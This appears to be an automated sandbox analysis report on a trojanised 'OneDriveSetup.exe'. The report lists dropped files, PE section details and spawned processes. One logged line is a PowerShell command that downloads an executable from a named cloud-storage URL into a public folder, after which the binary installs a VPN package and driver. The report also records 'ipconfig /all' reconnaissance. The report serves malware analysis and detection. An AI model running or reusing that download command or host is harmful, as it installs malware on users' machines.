                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeCode function: 9_2_00666F14 GetFileVersionInfoSizeW,GetFileVersionInfoW,GetProcAddress,LoadLibraryW,GetProcAddress,FreeLibrary,GetModuleHandleW,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetCurrentProcess,VerQueryValueW,VerQueryValueW,VerQueryValueW,RegQueryValueExW,RegCloseKey,9_2_00666F14
                Source: OneDriveSetup.exeStatic PE information: section name: .didat
                Source: OneDriveSetup.exeStatic PE information: section name: _RDATA
                Source: Agghosts.exe.0.drStatic PE information: section name: .00cfg
                Source: e_sqlite3.dll0.23.drStatic PE information: section name: _RDATA
                Source: WebView2Loader.dll.23.drStatic PE information: section name: .00cfg
                Source: WebView2Loader.dll.23.drStatic PE information: section name: _RDATA
                Source: WebView2Loader.dll0.23.drStatic PE information: section name: .00cfg
                Source: WebView2Loader.dll0.23.drStatic PE information: section name: .voltbl
                Source: ndp462-web.exe.23.drStatic PE information: section name: .boxld01
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeCode function: 9_2_0066240A push ecx; mov dword ptr [esp], 46040000h9_2_006D5B44
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeCode function: 9_2_00666AC8 push ecx; mov dword ptr [esp], 46040000h9_2_006D5CF1
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeCode function: 9_2_10009EA5 push ecx; ret 9_2_10009EB8
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeCode function: 24_2_10009EA5 push ecx; ret 24_2_10009EB8
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_04BF5DD0 push esp; ret 25_2_04BF5DE3
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_04BF1ABC push cs; retf 25_2_04BF1AD3
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_04BF1AC4 push cs; retf 25_2_04BF1AD3
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_04BF1B35 push ds; retf 25_2_04BF1B3B
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_08CA5818 push edx; retf A008h25_2_08CA57CE
                Source: e_sqlite3.dll.23.drStatic PE information: section name: .text entropy: 7.128615396301837

                Persistence and Installation Behavior

                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\driver\tap0901.sys
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://aa-1348336590.cos.ap-hongkong.myqcloud.com/kl.exe', 'C:\Users\Public\Videos\bin.exe')"
                Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
                Source: C:\Users\user\Desktop\OneDriveSetup.exeProcess created: reg.exe
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /all
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\zh-SG\LetsPRO.resources.dll
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Globalization.Calendars.dll
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Linq.Parallel.dll
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Security.Cryptography.Pkcs.dll
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Runtime.dll
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Security.Claims.dll
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Web.Services.Description.dll
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Runtime.Serialization.Primitives.dll
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Net.WebHeaderCollection.dll
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\Microsoft.Expression.Interactions.dll
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exe
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Security.Cryptography.X509Certificates.dll
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Net.Http.dll
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Diagnostics.TextWriterTraceListener.dll
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.ComponentModel.EventBasedAsync.dll
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Windows.Interactivity.dll
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\Microsoft.Web.WebView2.WinForms.dll
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\Mono.Cecil.Rocks.dll
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Collections.dll
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.IO.Packaging.dll
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.IO.FileSystem.Primitives.dll
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\Mono.Cecil.Mdb.dll
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.ServiceProcess.ServiceController.dll
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.ComponentModel.Primitives.dll
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\LetsPRO.exe
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\cs\System.Web.Services.Description.resources.dll
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\SuperSocket.ClientEngine.dll
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Collections.Concurrent.dll
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Net.IPNetwork.dll
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Net.Security.dll
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.ServiceModel.Security.dll
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\PusherClient.dll
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\SQLiteNetExtensionsAsync.dll
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\WpfAnimatedGif.dll
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Net.Requests.dll
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.ValueTuple.dll
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\es\System.Web.Services.Description.resources.dll
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Threading.dll
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.ServiceModel.NetTcp.dll
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.IO.IsolatedStorage.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Videos\bin.exe
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Net.NameResolution.dll
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\libwin.dll
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Text.Encoding.Extensions.dll
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.IO.FileSystem.dll
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\log4net.dll
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Resources.Writer.dll
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Drawing.Primitives.dll
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Resources.Reader.dll
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Buffers.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Diagnostics.Tools.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\ko\System.Web.Services.Description.resources.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Runtime.Numerics.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Xml.XmlSerializer.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Threading.Tasks.Extensions.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\fr\System.Web.Services.Description.resources.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\zh-TW\LetsPRO.resources.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\zh-CN\LetsPRO.resources.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\SQLitePCLRaw.batteries_v2.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Linq.Queryable.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Runtime.InteropServices.RuntimeInformation.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.IO.FileSystem.DriveInfo.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\Microsoft.Toolkit.Uwp.Notifications.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.ServiceModel.Duplex.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Xml.XPath.XDocument.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Threading.Tasks.Parallel.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\zh-Hant\System.Web.Services.Description.resources.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.IO.Compression.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Net.Sockets.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\ru\LetsPRO.resources.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Threading.Timer.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Runtime.Extensions.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Dynamic.Runtime.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.IO.Compression.ZipFile.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\SQLiteNetExtensions.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.IO.Ports.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Security.Permissions.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Runtime.CompilerServices.Unsafe.dllJump to dropped file
                Source: C:\Windows\System32\drvinst.exeFile created: C:\Windows\System32\DriverStore\Temp\{e1a4fd9a-c078-804d-adb0-e99915b985de}\SETEB17.tmpJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Text.Encoding.CodePages.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\Microsoft.AppCenter.Crashes.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\pt-BR\System.Web.Services.Description.resources.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.ServiceModel.Primitives.dllJump to dropped file
                Source: C:\Windows\System32\drvinst.exeFile created: C:\Windows\System32\drivers\SETF101.tmpJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Security.Cryptography.Encoding.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Security.Cryptography.Csp.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\x64\WebView2Loader.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Numerics.Vectors.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\pl\System.Web.Services.Description.resources.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Security.SecureString.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Xml.XmlDocument.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Diagnostics.PerformanceCounter.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\zh-MO\LetsPRO.resources.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\Microsoft.AppCenter.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\microsoft.identitymodel.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\CommunityToolkit.Mvvm.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\Utils.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\Microsoft.Win32.Registry.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.ComponentModel.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\Hardcodet.Wpf.TaskbarNotification.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsVPNDomainModel.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Diagnostics.EventLog.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\arm64\WebView2Loader.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.IO.Pipes.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\Microsoft.Web.WebView2.Wpf.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Security.AccessControl.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\zh-Hans\System.Web.Services.Description.resources.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\DeltaCompressionDotNet.PatchApi.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\SQLitePCLRaw.nativelibrary.dllJump to dropped file
                Source: C:\Windows\System32\drvinst.exeFile created: C:\Windows\System32\drivers\tap0901.sys (copy)Jump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\it\System.Web.Services.Description.resources.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Diagnostics.Debug.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.IO.Pipes.AccessControl.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsGoogleAnalytics.exeJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Diagnostics.StackTrace.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Text.RegularExpressions.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.CodeDom.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Security.Cryptography.Cng.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Diagnostics.Tracing.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\Microsoft.Win32.SystemEvents.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\ndp462-web.exeJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Xml.XDocument.dllJump to dropped file
                Source: C:\Users\user\Desktop\OneDriveSetup.exeFile created: C:\Users\Public\Music\20250413054815\Agghosts.exeJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Security.Cryptography.Algorithms.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Threading.Thread.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\Mono.Cecil.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Net.WebSockets.Client.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\FontAwesome.WPF.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Data.OleDb.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\SVGImage.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.ServiceModel.Http.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\runtimes\win-x64\native\e_sqlite3.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\Microsoft.Win32.Registry.AccessControl.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Diagnostics.FileVersionInfo.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.IO.FileSystem.Watcher.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Users\user\AppData\Local\Temp\nsj49F4.tmp\System.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\Update.exeJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\Mono.Cecil.Pdb.dllJump to dropped file
                Source: C:\Windows\System32\drvinst.exeFile created: C:\Windows\System32\DriverStore\Temp\{e1a4fd9a-c078-804d-adb0-e99915b985de}\tap0901.sys (copy)Jump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Globalization.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\zh-HK\LetsPRO.resources.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.IO.FileSystem.AccessControl.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\de\System.Web.Services.Description.resources.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Diagnostics.TraceSource.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Drawing.Common.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Runtime.Serialization.Xml.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\ToastNotifications.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Xml.XPath.dllJump to dropped file
                Source: C:\Users\user\Desktop\OneDriveSetup.exeFile created: C:\Users\Public\Music\20250413054815\libcef.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\SQLitePCLRaw.core.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Linq.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Console.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\ru\System.Web.Services.Description.resources.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Threading.Overlapped.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Diagnostics.Contracts.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Net.Primitives.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Configuration.ConfigurationManager.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\ICSharpCode.AvalonEdit.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Runtime.CompilerServices.VisualC.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\uninst.exeJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\runtimes\win-x86\native\e_sqlite3.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Reflection.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.ComponentModel.TypeConverter.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Threading.Tasks.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\Microsoft.Win32.Primitives.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\x86\WebView2Loader.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\DeltaCompressionDotNet.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Runtime.Handles.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Data.SqlClient.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsGoogleAnalytics.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.ObjectModel.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\Microsoft.Bcl.AsyncInterfaces.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Net.Ping.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\netstandard.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\DeltaCompressionDotNet.MsDelta.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.IO.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\SQLitePCLRaw.provider.dynamic_cdecl.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Data.Odbc.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Threading.ThreadPool.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Security.Principal.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Diagnostics.Process.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\runtimes\win-arm\native\e_sqlite3.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\NuGet.Squirrel.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Data.Common.dllJump to dropped file
